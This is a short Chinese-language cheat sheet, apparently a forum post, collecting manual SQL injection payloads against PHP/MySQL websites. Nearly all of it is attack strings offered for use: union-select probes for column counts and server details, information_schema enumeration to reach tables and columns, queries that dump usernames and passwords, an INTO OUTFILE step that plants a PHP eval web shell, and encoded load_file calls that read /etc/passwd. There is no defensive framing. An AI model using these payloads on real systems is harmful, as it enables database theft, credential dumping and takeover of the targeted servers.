PHP+MySQL 手工注入語句大全

我PHP手工太菜了， 無奈只能補下PHP MYSQL手工注射，把收集總結的資料分享下。
暴欄位長度

Order by num/*

匹配欄位

and 1=1 union select 1,2,3,4,5…….n/*

暴欄位位置

and 1=2 union select 1,2,3,4,5……n/*

利用內建函式暴資料庫資訊

version() database() user()

不用猜解可用欄位暴資料庫資訊(有些網站不適用):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

作業系統資訊：

and 1=2 union all select @@global.version_compile_os from mysql.user /* 

資料庫許可權：

and ord(mid(user(),1,1))=114 /* 返回正常說明為root

暴庫 (mysql>5.0)

Mysql 5 以上有內建庫 information_schema，儲存著mysql的所有資料庫和表結構資訊

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

猜表

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=資料庫（十六進位制） limit 0（開始的記錄，0為第一個開始記錄）,1（顯示1條記錄）—

猜欄位

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名（十六進位制）limit 0,1

暴密碼

and 1=2 Union select 1,2,3,使用者名稱段,5,6,7,密碼段,8,9 from 表名 limit 0,1

高階用法（一個可用欄位顯示兩個資料內容）：

Union select 1,2,3concat(使用者名稱段,0x3c,密碼段),5,6,7,8,9 from 表名 limit 0,1

直接寫馬(Root許可權)

條件：1、知道站點物理路徑

   2、有足夠大的許可權（可以用select …. from mysql.user測試）
   3、magic_quotes_gpc()=OFF123

select ‘<?php eval($_POST[cmd])?>’ into outfile ‘物理路徑’

and 1=2 union all select 一句話HEX值 into outfile ‘路徑’

load_file() 常用路徑：

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
　　2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
　　上面兩個是檢視一個PHP檔案裡完全顯示程式碼.有些時候不替換一些字元,如 “<” 替換成”空格” 返回的是網頁.而無法檢視到程式碼.